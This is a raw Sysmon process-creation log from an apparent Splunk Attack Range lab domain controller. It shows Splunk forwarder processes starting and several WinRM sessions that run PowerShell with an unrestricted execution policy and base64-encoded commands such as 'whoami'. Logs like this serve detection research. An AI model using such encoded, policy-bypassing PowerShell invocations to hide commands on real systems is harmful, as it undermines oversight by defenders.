AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E77-6078-9400-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2064 154100x80000000000000003905Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.171{A8622C2F-3E77-6078-9400-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2064C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3E77-6078-9300-00000000AE01}2780C:\Program Files\SplunkUniversalForwarder\bin\splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2064 154100x80000000000000003892Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.159{A8622C2F-3E77-6078-9300-00000000AE01}2780C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2064C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x80000000000000003805Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:21.593{A8622C2F-3E49-6078-9200-00000000AE01}3344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003788Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:19.823{A8622C2F-3E47-6078-9100-00000000AE01}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003772Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:19.150{A8622C2F-3E47-6078-9000-00000000AE01}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003758Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:18.179{A8622C2F-3E46-6078-8F00-00000000AE01}5060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003743Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:16.471{A8622C2F-3E44-6078-8E00-00000000AE01}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003728Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:23:15.563{A8622C2F-3E43-6078-8D00-00000000AE01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003714Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:23:14.686{A8622C2F-3E42-6078-8C00-00000000AE01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000003676Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:51.472{A8622C2F-3E2B-6078-8B00-00000000AE01}4464C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeC:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{A8622C2F-3E2B-6078-8A00-00000000AE01}4252C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 154100x80000000000000003663Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:51.463{A8622C2F-3E2B-6078-8A00-00000000AE01}4252C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E2B-6078-8800-00000000AE01}4348C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /d /c C:\Windows\system32\silcollector.cmd configure 154100x80000000000000003616Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:43.377{A8622C2F-3E23-6078-8700-00000000AE01}3748C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft 
Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3E23-6078-9184-080000000000}0x884910HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{A8622C2F-3E23-6078-8600-00000000AE01}5036C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 154100x80000000000000003589Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:43.204{A8622C2F-3E23-6078-8600-00000000AE01}5036C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3E23-6078-9184-080000000000}0x884910HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3E23-6078-8500-00000000AE01}5024C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 154100x80000000000000003576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:43.198{A8622C2F-3E23-6078-8500-00000000AE01}5024C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3E23-6078-9184-080000000000}0x884910HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E23-6078-8300-00000000AE01}4948C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x80000000000000003557Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:43.105{A8622C2F-3E23-6078-8300-00000000AE01}4948C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3E23-6078-9184-080000000000}0x884910HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000003522Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:42.648{A8622C2F-3E22-6078-8200-00000000AE01}4820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3E22-6078-6445-080000000000}0x845640HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3E22-6078-8100-00000000AE01}4808C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 154100x80000000000000003509Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:42.642{A8622C2F-3E22-6078-8100-00000000AE01}4808C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3E22-6078-6445-080000000000}0x845640HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E22-6078-7F00-00000000AE01}4732C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x80000000000000003490Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:42.542{A8622C2F-3E22-6078-7F00-00000000AE01}4732C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell 
pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3E22-6078-6445-080000000000}0x845640HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000002935Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:30.557{A8622C2F-3E16-6078-7C00-00000000AE01}4140C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3E14-6078-A389-050000000000}0x589a30HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x80000000000000002917Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:30.499{A8622C2F-3E16-6078-7A00-00000000AE01}3380C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3E10-6078-0288-050000000000}0x588020HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 
154100x80000000000000002825Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:21.519{A8622C2F-3E0D-6078-7800-00000000AE01}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002801Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:20.646{A8622C2F-3E0C-6078-7700-00000000AE01}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002785Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:19.759{A8622C2F-3E0B-6078-7600-00000000AE01}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002771Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:19.076{A8622C2F-3E0B-6078-7500-00000000AE01}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002751Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:18.193{A8622C2F-3E0A-6078-7400-00000000AE01}3764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002736Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:17.302{A8622C2F-3E09-6078-7300-00000000AE01}3624C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002722Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:16.410{A8622C2F-3E08-6078-7200-00000000AE01}2044C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002705Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:15.520{A8622C2F-3E07-6078-7100-00000000AE01}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002689Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:14.628{A8622C2F-3E06-6078-7000-00000000AE01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002670Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:13.770{A8622C2F-3E05-6078-6F00-00000000AE01}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002650Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:13.621{A8622C2F-3E05-6078-6E00-00000000AE01}3116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows 
